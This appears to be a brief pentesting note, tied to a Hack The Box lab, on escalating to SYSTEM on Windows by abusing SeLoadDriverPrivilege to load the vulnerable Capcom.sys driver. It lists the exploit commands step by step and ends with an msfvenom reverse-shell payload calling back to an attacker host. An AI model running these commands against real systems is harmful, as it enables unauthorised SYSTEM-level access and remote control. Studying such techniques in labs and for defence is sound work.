SeLoadDriver Privilege

HTB: Fuse0xdf hacks stuff

Privileged Accounts and Token PrivilegesRed Teaming Experiments

Privileged Accounts and Token PrivilegesHackTricks

GitHub - k4sth4/SeLoadDriverPrivilege: Windows Privilege EscalationGitHub

The last github has all the instructions.

Upload the driver eoploaddriver_x64.exe, Capcom.sys file, ExploitCapcom.exe on target machine under writable directory.

First we need to turn on the privilege of SeLoadDriverPrivilege that is disabled.

.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys

Now using ExploitCapcom.exe load Capcom.sys to target machine.

.\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys

After successfully loading Capcom.sys we can now run any cmd as privilege user with EXPLOIT keyword.

.\ExploitCapcom.exe EXPLOIT whoami

Now we can generate a revshell with msfvenom. You can also use other revshell. On Attacker vm.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe

Upload it on Traget machine. Now execute the payload.

.\ExploitCapcom.exe EXPLOIT shell.exe

You gonna get reverse shell as SYSTEM.